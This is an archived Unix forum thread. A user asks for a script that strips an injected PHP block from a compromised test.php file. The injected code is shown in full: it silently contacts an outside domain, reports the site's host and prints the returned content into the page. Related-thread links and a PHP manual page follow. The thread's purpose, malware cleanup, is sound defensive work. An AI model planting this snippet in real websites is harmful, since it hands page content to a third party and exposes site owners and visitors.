Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: remove malicious codes from a file
Top Forums Shell Programming and Scripting remove malicious codes from a file Post 302171169 by fed.linuxgossip on Wednesday 27th of February 2008 08:02:19 PM
Old 02-27-2008
cat test.php file
##########
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>




In the above file I want to remove:

<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>


So after removing the above part the resultant file looks like:

cat test.php file
##########
<?php
phpinfo();
?>



Can you please advise a script that will search or grep

$fn = "googlesindication.cn";


and then remove the entire php paragraph that it is enclosed with : starting
<?php
and ending
?>



Thanks
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

2. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

3. Shell Programming and Scripting

Removal of HTML ASCII Codes from file

Hi all, I have a file with extended ASCII codes in the description which needs to be removed. List of extended ascii codes "Œ", "œ", "Š", "š", "Ÿ", "ƒ", "-", "-", "‘", "'", "‚", "“", "”", "„","†", "‡", "•", "...", "‰", "€", "™" Sample data: Test Details-HAVE BEEN PUBLISHED... (1 Reply)
Discussion started by: btt3165
1 Replies

4. UNIX for Dummies Questions & Answers

Display file with escaped color codes

Hi, I have a file containing color codes: Fri May 25 17:13:04 2012: Starting MTA: exim4^ Loading cpufreq kernel modules...^How can I display it colorized on a linux terminal? (4 Replies)
Discussion started by: ripat
4 Replies

5. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

6. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies

7. UNIX for Beginners Questions & Answers

How to remove unused html codes from the file using UNIX?

Hi All, We have a HTML source which will be processed using a informatica workflow. In between these two we have a Unix script which transforms the file. We are getting an error from past week in the informatica saying invalid format, because the file has unused html reference (0-8,14-31 etc)... (2 Replies)
Discussion started by: karthik adiga
2 Replies

LEARN ABOUT PHP

debug_print_backtrace

DEBUG_PRINT_BACKTRACE(3)						 1						  DEBUG_PRINT_BACKTRACE(3)

debug_print_backtrace - Prints a backtrace

SYNOPSIS

       void debug_print_backtrace ([int  $options], [int  $limit])

DESCRIPTION

       debug_print_backtrace(3) prints a PHP backtrace. It prints the function calls, included/required files and eval(3)ed stuff.

PARAMETERS

	      o $options
		- As of 5.3.6, this parameter is a bitmask for the following options:

	      debug_print_backtrace(3) options

	      +----------------------------+---------------------------------------------------+
	      |DEBUG_BACKTRACE_IGNORE_ARGS |						       |
	      | 			   |						       |
	      | 			   |  Whether  or  not	to  omit the "args" index, and |
	      | 			   | thus all the function/method arguments,  to  save |
	      | 			   | memory.					       |
	      | 			   |						       |
	      +----------------------------+---------------------------------------------------+
	      o $limit
		-  As of 5.4.0, this parameter can be used to limit the number of stack frames printed. By default ($limit= 0) it prints all stack
		frames.

RETURN VALUES

	No value is returned.

CHANGELOG

       +--------+-----------------------------------------+
       |Version |					  |
       |	|					  |
       |	|		Description		  |
       |	|					  |
       +--------+-----------------------------------------+
       | 5.4.0	|					  |
       |	|					  |
       |	|   Added the optional parameter $limit.  |
       |	|					  |
       | 5.3.6	|					  |
       |	|					  |
       |	|  Added the optional parameter $options. |
       |	|					  |
       +--------+-----------------------------------------+
EXAMPLES

       Example #1

	      debug_print_backtrace(3) example

	      <?php
	      // include.php file

	      function a() {
		  b();
	      }

	      function b() {
		  c();
	      }

	      function c(){
		  debug_print_backtrace();
	      }

	      a();

	      ?>

	      <?php
	      // test.php file
	      // this is the file you should run

	      include 'include.php';
	      ?>

	      The above example will output something similar to:

	      #0  c() called at [/tmp/include.php:10]
	      #1  b() called at [/tmp/include.php:6]
	      #2  a() called at [/tmp/include.php:17]
	      #3  include(/tmp/include.php) called at [/tmp/test.php:3]

SEE ALSO

       debug_backtrace(3).

PHP Documentation Group 												  DEBUG_PRINT_BACKTRACE(3)
All times are GMT -4. The time now is 03:49 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy